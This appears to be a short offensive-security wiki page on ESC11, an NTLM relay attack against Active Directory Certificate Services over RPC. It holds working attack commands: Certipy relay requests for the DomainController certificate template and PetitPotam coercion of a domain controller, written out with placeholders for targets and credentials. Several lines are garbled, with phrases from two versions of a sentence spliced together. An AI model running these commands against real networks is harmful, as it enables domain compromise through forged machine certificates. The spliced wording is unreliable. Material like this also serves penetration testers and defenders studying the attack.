Skip to main content

ESC11

The vulnerability identified as ESC11 involves exploiting the modification of the IF_ENFORCEENCRYPTICERTREQUEST flag in the MS-ICPR RPC interface of ADCS, potentially allowing an NTLM relay attack to request certificates from authorized certificate templates via AD CS ICPR endpoints, utilizing tools like ntlmrelayx.py or Certipy to relay coerced SMB NTLM authentication over RPC/ICRP, which, if successful, enables certificate enrollment over unencrypted sessions.

Linux

AbusingSetup ESC11the with Certipyrelay

bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController

Coerce authentication with PetitPotam

bob$ python3 PetitPotam.py -u <user> -p <pass> -d <domain> <target_ip_address> <listener_address>

Certipy receiving Authentication from LAB-DC$the AD DC

bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController

From here on,Now we can continue similarly tofollow the ESC8steps attackfrom chain.

ESC8